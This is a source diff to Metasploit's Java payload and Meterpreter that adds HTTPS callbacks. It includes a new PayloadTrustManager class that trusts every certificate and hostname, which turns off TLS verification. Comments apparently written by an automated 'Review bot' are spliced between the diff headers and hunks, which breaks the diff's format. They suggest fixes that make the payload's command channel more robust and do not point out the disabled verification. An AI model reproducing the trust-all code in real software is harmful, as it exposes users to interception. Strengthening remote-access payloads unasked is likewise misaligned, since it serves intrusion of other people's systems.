diff --git a/data/java/metasploit/Payload.class b/data/java/metasploit/Payload.class
index 505e83d70f..c8bc897506 100755
Binary files a/data/java/metasploit/Payload.class and b/data/java/metasploit/Payload.class differ
diff --git a/data/meterpreter/meterpreter.jar b/data/meterpreter/meterpreter.jar
index a9583a5a90..45f2b4406f 100755
Binary files a/data/meterpreter/meterpreter.jar and b/data/meterpreter/meterpreter.jar differ
diff --git a/external/source/javapayload/src/metasploit/Payload.java b/external/source/javapayload/src/metasploit/Payload.java
index 083d32c256..7afa376932 100644
--- a/external/source/javapayload/src/metasploit/Payload.java
+++ b/external/source/javapayload/src/metasploit/Payload.java
@@ -105,6 +105,9 @@ public class Payload extends ClassLoader {
 classFile.getParentFile().mkdirs();
 // load ourselves via the class loader (works both on disk and from Jar)
 writeEmbeddedFile(clazz, clazzFile, classFile);
+ if(props.getProperty("URL", "").startsWith("https:")) {
+ writeEmbeddedFile(clazz, "metasploit/PayloadTrustManager.class", new File(classFile.getParentFile(), "PayloadTrustManager.class"));
+ }
 FileOutputStream fos = new FileOutputStream(propFile);
 props.store(fos, "");
 fos.close();
diff --git a/external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/Meterpreter.java b/external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/Meterpreter.java
index 79cb3b5678..97377a1f0e 100644
--- a/external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/Meterpreter.java
+++ b/external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/Meterpreter.java
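Review bot: The scheme test `props.getProperty("URL", "").startsWith("https:")` is case-sensitive, while `java.net.URL` normalizes the protocol to lower case, so a URL written as `HTTPS://…` would presumably be opened over TLS by the Meterpreter side without `PayloadTrustManager.class` ever having been staged next to the payload class, and the reflective lookup would then fail on every request. A lower-cased comparison, `if(props.getProperty("URL", "").toLowerCase().startsWith("https:")) {`, closes that gap at no cost. A short comment on why the class is only written for https, e.g. `// the trust manager needs Sun JRE 1.4+ classes, so it is only staged when TLS is actually in use`, would also help the next reader. The enclosing method starts and ends outside this hunk.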
@@ -167,6 +167,15 @@ public class Meterpreter {
 TLVPacket request = null;
 try {
 URLConnection uc = url.openConnection();
+ if (url.getProtocol().equals("https")) {
+ // load the trust manager via reflection, to avoid loading
+ // it when it is not needed (it requires Sun Java 1.4+)
+ try {
+ Class.forName("com.metasploit.meterpreter.PayloadTrustManager").getMethod("useFor", new Class[] {URLConnection.class}).invoke(null, new Object[] {uc});
+ } catch (Exception ex) {
+ ex.printStackTrace(getErrorStream());
+ }
+ }
 uc.setDoOutput(true);
 OutputStream out = uc.getOutputStream();
 out.write(outPacket == null ? RECV : outPacket);
diff --git a/external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/PayloadTrustManager.java b/external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/PayloadTrustManager.java
new file mode 100644
index 0000000000..d17fc46287
--- /dev/null
+++ b/external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/PayloadTrustManager.java
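Review bot: The catch block only prints the exception and then lets the request go ahead with the connection's default socket factory, so a failure to install the trust manager surfaces later as a handshake error on `uc.getOutputStream()` rather than at the point of the cause; that fallback should be stated, e.g. `// on failure the JRE's default trust store stays in effect and the handshake below may fail`. The class name is a string literal rather than a `PayloadTrustManager.class` literal for a reason the comment does not give: a class literal would itself load the class and defeat the lazy loading, so a comment such as `// string literal on purpose: a class literal would load PayloadTrustManager eagerly` is worth adding. The `try` that opens here and the enclosing method both continue past the end of the hunk.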
@@ -0,0 +1,63 @@
+package com.metasploit.meterpreter;
+
+import java.net.URLConnection;
+
+import javax.net.ssl.HostnameVerifier;
+import javax.net.ssl.HttpsURLConnection;
+import javax.net.ssl.SSLContext;
+import javax.net.ssl.SSLSession;
+import javax.net.ssl.SSLSocketFactory;
+import javax.net.ssl.TrustManager;
+import javax.net.ssl.X509TrustManager;
+import java.security.cert.X509Certificate;
+
+/**
+ * Trust manager used for HTTPS URL connection. This is in its own class because it
+ * depends on classes only present on Sun JRE 1.4+, and incorporating it into
+ * the main {@link Meterpreter} class would have made it impossible for other/older
+ * JREs to load it.
+ *
+ * This class is substantically identical to the metasploit.PayloadTrustManager class,
+ * only that it tries to cache the ssl context and trust manager between calls.
+ */
+public class PayloadTrustManager implements X509TrustManager, HostnameVerifier {
+
+ public X509Certificate[] getAcceptedIssuers() {
+ // no preferred issuers
+ return new X509Certificate[0];
+ }
+
+ public void checkClientTrusted(java.security.cert.X509Certificate[] certs, String authType) {
+ // trust everyone
+ }
+
+ public void checkServerTrusted(java.security.cert.X509Certificate[] certs, String authType) {
+ // trust everyone
+ }
+
+ public boolean verify(String hostname, SSLSession session) {
+ // trust everyone
+ return true;
+ }
+
+ private static PayloadTrustManager instance;
+ private static SSLSocketFactory factory;
+
+ /**
+ * Called by the {@link Payload} class to modify the given
+ * {@link URLConnection} so that it uses this trust manager.
+ */
+ public static synchronized void useFor(URLConnection uc) throws Exception {
+ if (uc instanceof HttpsURLConnection) {
+ HttpsURLConnection huc = ((HttpsURLConnection) uc);
+ if (instance == null) {
+ instance = new PayloadTrustManager();
+ SSLContext sc = SSLContext.getInstance("SSL");
+ sc.init(null, new TrustManager[] { instance }, new java.security.SecureRandom());
+ factory = sc.getSocketFactory();
+ }
+ huc.setSSLSocketFactory(factory);
+ huc.setHostnameVerifier(instance);
+ }
+ }
+}
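Review bot: In `useFor` the cached `instance` is assigned before `SSLContext.getInstance` and `sc.init` run, so if either throws, `instance` stays non-null while `factory` stays null; every later call then skips initialization and passes `null` to `huc.setSSLSocketFactory`, which throws `IllegalArgumentException`, and the trust manager is never retried. Guarding on the value that is set last fixes this with one line: `if (factory == null) {`, since a failed attempt then leaves `factory` null and the next call rebuilds both fields. The Javadoc's `{@link Payload}` does not resolve from this package (the caller, per the Meterpreter.java hunk, is `Meterpreter` via reflection), so it should read `Called reflectively by {@link Meterpreter} …`; "substantically" in the class comment is a typo for "substantially". `SSLContext.getInstance("SSL")` also relies on the Sun-specific alias rather than the standard `"TLS"` name, which is presumably deliberate for the JRE 1.4 target and deserves a one-line comment saying so.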